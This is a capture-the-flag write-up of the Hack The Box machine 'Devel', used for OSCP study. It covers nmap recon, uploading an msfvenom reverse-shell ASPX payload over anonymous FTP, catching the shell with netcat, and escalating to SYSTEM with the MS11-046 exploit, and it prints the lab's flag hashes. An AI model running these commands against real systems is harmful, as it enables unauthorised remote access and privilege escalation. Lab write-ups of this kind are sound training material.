Devel
Introduction:
This is a windows machine running IIS server, FTP service and presents few exploitable vulnerabilities. Its a very easy machine and I avoided using metasploit to work on this machine as I want to avoid/limit the usage as much as possible keeping the OSCP in mind.
Recon
Nmap output
1Nmap scan report for 10.10.10.5
2Host is up (0.014s latency).
3Not shown: 998 filtered ports
4PORT STATE SERVICE VERSION
521/tcp open ftp Microsoft ftpd
6| ftp-anon: Anonymous FTP login allowed (FTP code 230)
7| 03-18-17 01:06AM <DIR> aspnet_client
8| 12-22-20 10:06PM 2894 ex.aspx
9| 03-17-17 04:37PM 689 iisstart.htm
10|_03-17-17 04:37PM 184946 welcome.png
11| ftp-syst:
12|_ SYST: Windows_NT
1380/tcp open http Microsoft IIS httpd 7.5
14| http-methods:
15|_ Potentially risky methods: TRACE
16|_http-server-header: Microsoft-IIS/7.5
17|_http-title: IIS7
18Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
19Device type: general purpose|phone|specialized
20Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
21OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
22Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
23No exact OS matches for host (test conditions non-ideal).
24Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
25
26OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
27Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
28
29
Notes:
- Anonymous FTP is open on port 21
- IIS httpd 7.5 server running on Windows likely versions ( Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 )
- Potentially risky methods: TRACE seems interesting
Enumeration
Going to the url http://10.10.10.5/ shows a default IIS7 welcome page and now we are confident that the IIS is version 7.x.
1$ ftp 10.10.10.5
2Connected to 10.10.10.5.
3220 Microsoft FTP Service
4Name (10.10.10.5:eneloop): ftp
5331 Anonymous access allowed, send identity (e-mail name) as password.
6Password:
7230 User logged in.
8Remote system type is Windows_NT.
9ftp> pwd
10257 "/" is current directory.
11ftp> ls
12200 PORT command successful.
13125 Data connection already open; Transfer starting.
1403-18-17 01:06AM <DIR> aspnet_client
1512-22-20 10:06PM 2894 ex.aspx
1603-17-17 04:37PM 689 iisstart.htm
1703-17-17 04:37PM 184946 welcome.png
18226 Transfer complete.
19ftp>
20
And, we are able to transfer files -
1ftp> put test.txt
2local: test.txt remote: test.txt
3200 PORT command successful.
4125 Data connection already open; Transfer starting.
5226 Transfer complete.
6ftp>
7
This great! Now, lets get on with the exploitation.
Exploitation
Low-level access
Using the anonymous FTP, transfer the winpeas
1# ftp 10.10.10.5
2Connected to 10.10.10.5.
3220 Microsoft FTP Service
4Name (10.10.10.5:eneloop): ftp
5331 Anonymous access allowed, send identity (e-mail name) as password.
6Password:
7230 User logged in.
8Remote system type is Windows_NT.
9ftp> put winPEAS.bat
10local: winPEAS.bat remote: winPEAS.bat
11200 PORT command successful.
12125 Data connection already open; Transfer starting.
13226 Transfer complete.
1435761 bytes sent in 0.00 secs (7.9516 MB/s)
15ftp>
16
Create a shell.aspx using the command below and transfer this file to the root of the webserver as well.
Access this page from the browser after you have started the local listener. You should now have a low level shell access on this machine.
1# msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.15 lport 4444 -f aspx > shell.aspx
2[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3[-] No arch selected, selecting arch: x86 from the payload
4Error: One or more options failed to validate: LPORT.
5root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data# msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.15 lport=4444 -f aspx > shell.aspx
6[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
7[-] No arch selected, selecting arch: x86 from the payload
8No encoder specified, outputting raw payload
9Payload size: 324 bytes
10Final size of aspx file: 2731 bytes
11root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data#
12root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data#
13root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data# ftp 10.10.10.5
14Connected to 10.10.10.5.
15220 Microsoft FTP Service
16Name (10.10.10.5:eneloop): ftp
17331 Anonymous access allowed, send identity (e-mail name) as password.
18Password:
19230 User logged in.
20Remote system type is Windows_NT.
21ftp> put shell.aspx
22local: shell.aspx remote: shell.aspx
23200 PORT command successful.
24125 Data connection already open; Transfer starting.
25226 Transfer complete.
262766 bytes sent in 0.00 secs (4.9031 MB/s)
27ftp>
28
Start the listener, and browse to the reverse shell page.
1nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.10.14.15] from (UNKNOWN) [10.10.10.5] 49165
4ls
5dir
6pwd
7l
8
9 Directory: C:\windows\system32\inetsrv
10
11
12Mode LastWriteTime Length Name
13---- ------------- ------ ----
14d---- 17/3/2017 4:37 ?? config
15d---- 17/3/2017 6:33 ?? en-US
16-a--- 14/7/2009 4:14 ?? 155648 appcmd.exe
Lets run the winpeas.bat and gather more information so we can elevate our access.
1
2 [+] CURRENT USER
3The request will be processed at a domain controller for domain HTB.
4
5
6USER INFORMATION
7----------------
8
9User Name SID
10=============== ==============================================================
11iis apppool\web S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550
12
13
14GROUP INFORMATION
15-----------------
16
17Group Name Type SID Attributes
18==================================== ================ ============ ==================================================
19Mandatory Label\High Mandatory Level Label S-1-16-12288
20Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
21BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
22NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
23CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
24NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
25NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
26BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
27LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
28 Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
29
30
31PRIVILEGES INFORMATION
32----------------------
33
34Privilege Name Description State
35============================= ========================================= ========
36SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
37SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
38SeShutdownPrivilege Shut down the system Disabled
39SeAuditPrivilege Generate security audits Disabled
40SeChangeNotifyPrivilege Bypass traverse checking Enabled
41SeUndockPrivilege Remove computer from docking station Disabled
42SeImpersonatePrivilege Impersonate a client after authentication Enabled
43SeCreateGlobalPrivilege Create global objects Enabled
44SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
45SeTimeZonePrivilege Change the time zone Disabled
46
47 [+] USERS
48
49User accounts for \\
50
51-------------------------------------------------------------------------------
52Administrator babis Guest
53The command completed with one or more errors.
54
55
Possible exploits -
You will find a bunch of exploits that this machine is potentially vulnerable to, so you cam go dozens of different ways from here based on which exploit you would like to use.
The tools I find useful -
WSENG : https://github.com/bitsadmin/wesng.git Windows-Exploit-Suggester : https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
Post-exploit/PrivEsc
MS11-046 exploit seems applicable based on the suggestions and you can download it from the repo - https://github.com/abatchy17/WindowsExploits
Now, transfer the exploit over and run it to escalate your privilege.
1c:\>cd inetpub\wwwroot
2cd inetpub\wwwroot
3
4c:\inetpub\wwwroot>dir
5dir
6 Volume in drive C has no label.
7 Volume Serial Number is 8620-71F1
8
9 Directory of c:\inetpub\wwwroot
10
1123/12/2020 06:10 �� <DIR> .
1223/12/2020 06:10 �� <DIR> ..
1318/03/2017 01:06 �� <DIR> aspnet_client
1423/12/2020 06:05 �� 1.442 cmdasp.aspx
1517/03/2017 04:37 �� 689 iisstart.htm
1623/12/2020 06:03 �� 112.815 MS11-046.exe
1723/12/2020 06:10 �� 2.766 shell.aspx
1817/03/2017 04:37 �� 184.946 welcome.png
19 5 File(s) 302.658 bytes
20 3 Dir(s) 22.106.157.056 bytes free
21
22c:\inetpub\wwwroot>MS11-046.exe
23MS11-046.exe
24
25c:\Windows\System32>whoami
26whoami
27nt authority\system
28
29c:\Windows\System32>ls
30ls
31'ls' is not recognized as an internal or external command,
32operable program or batch file.
33
34c:\Windows\System32>cd C:\Users
35cd C:\Users
36
37C:\Users>dir
38dir
39 Volume in drive C has no label.
40 Volume Serial Number is 8620-71F1
41
42 Directory of C:\Users
43
4418/03/2017 01:16 �� <DIR> .
4518/03/2017 01:16 �� <DIR> ..
4618/03/2017 01:16 �� <DIR> Administrator
4717/03/2017 04:17 �� <DIR> babis
4818/03/2017 01:06 �� <DIR> Classic .NET AppPool
4914/07/2009 09:20 �� <DIR> Public
50 0 File(s) 0 bytes
51 6 Dir(s) 22.106.144.768 bytes free
52
53C:\Users>cd Administrator
54cd Administrator
55
56C:\Users\Administrator>dir
57dir
58 Volume in drive C has no label.
59 Volume Serial Number is 8620-71F1
60
61 Directory of C:\Users\Administrator
62
6318/03/2017 01:16 �� <DIR> .
6418/03/2017 01:16 �� <DIR> ..
6518/03/2017 01:16 �� <DIR> Contacts
6618/03/2017 01:17 �� <DIR> Desktop
6718/03/2017 01:16 �� <DIR> Documents
6818/03/2017 01:16 �� <DIR> Downloads
6918/03/2017 01:16 �� <DIR> Favorites
7018/03/2017 01:16 �� <DIR> Links
7118/03/2017 01:16 �� <DIR> Music
7218/03/2017 01:16 �� <DIR> Pictures
7318/03/2017 01:16 �� <DIR> Saved Games
7418/03/2017 01:16 �� <DIR> Searches
7518/03/2017 01:16 �� <DIR> Videos
76 0 File(s) 0 bytes
77 13 Dir(s) 22.106.144.768 bytes free
78
79C:\Users\Administrator>cd Desktop
80cd Desktop
81
82C:\Users\Administrator\Desktop>dir
83dir
84 Volume in drive C has no label.
85 Volume Serial Number is 8620-71F1
86
87 Directory of C:\Users\Administrator\Desktop
88
8918/03/2017 01:17 �� <DIR> .
9018/03/2017 01:17 �� <DIR> ..
9118/03/2017 01:17 �� 32 root.txt.txt
92 1 File(s) 32 bytes
93 2 Dir(s) 22.106.144.768 bytes free
94
95C:\Users\Administrator\Desktop>type root.txt.txt
96type root.txt.txt
97e621a0b5041708797c4fc4728bc72b4b
98C:\Users\Administrator\Desktop>cd ../../babes
99cd ../../babes
100The system cannot find the path specified.
101
102C:\Users\Administrator\Desktop>cd ../..
103cd ../..
104
105C:\Users>dir
106dir
107 Volume in drive C has no label.
108 Volume Serial Number is 8620-71F1
109
110 Directory of C:\Users
111
11218/03/2017 01:16 �� <DIR> .
11318/03/2017 01:16 �� <DIR> ..
11418/03/2017 01:16 �� <DIR> Administrator
11517/03/2017 04:17 �� <DIR> babis
11618/03/2017 01:06 �� <DIR> Classic .NET AppPool
11714/07/2009 09:20 �� <DIR> Public
118 0 File(s) 0 bytes
119 6 Dir(s) 22.106.025.984 bytes free
120
121C:\Users>cd babis
122cd babis
123
124C:\Users\babis>dir
125dir
126 Volume in drive C has no label.
127 Volume Serial Number is 8620-71F1
128
129 Directory of C:\Users\babis
130
13117/03/2017 04:17 �� <DIR> .
13217/03/2017 04:17 �� <DIR> ..
13317/03/2017 04:17 �� <DIR> Contacts
13418/03/2017 01:14 �� <DIR> Desktop
13517/03/2017 04:17 �� <DIR> Documents
13617/03/2017 04:17 �� <DIR> Downloads
13717/03/2017 04:17 �� <DIR> Favorites
13817/03/2017 04:17 �� <DIR> Links
13917/03/2017 04:17 �� <DIR> Music
14017/03/2017 04:17 �� <DIR> Pictures
14117/03/2017 04:17 �� <DIR> Saved Games
14217/03/2017 04:17 �� <DIR> Searches
14317/03/2017 04:17 �� <DIR> Videos
144 0 File(s) 0 bytes
145 13 Dir(s) 22.106.025.984 bytes free
146
147C:\Users\babis>cd Desktop
148cd Desktop
149
150C:\Users\babis\Desktop>dir
151dir
152 Volume in drive C has no label.
153 Volume Serial Number is 8620-71F1
154
155 Directory of C:\Users\babis\Desktop
156
15718/03/2017 01:14 �� <DIR> .
15818/03/2017 01:14 �� <DIR> ..
15918/03/2017 01:18 �� 32 user.txt.txt
160 1 File(s) 32 bytes
161 2 Dir(s) 22.106.025.984 bytes free
162
163C:\Users\babis\Desktop>type user.txt.txt
164type user.txt.txt
1659ecdd6a3aedf24b41562fea70f4cb3e8
166C:\Users\babis\Desktop>
167
Notes: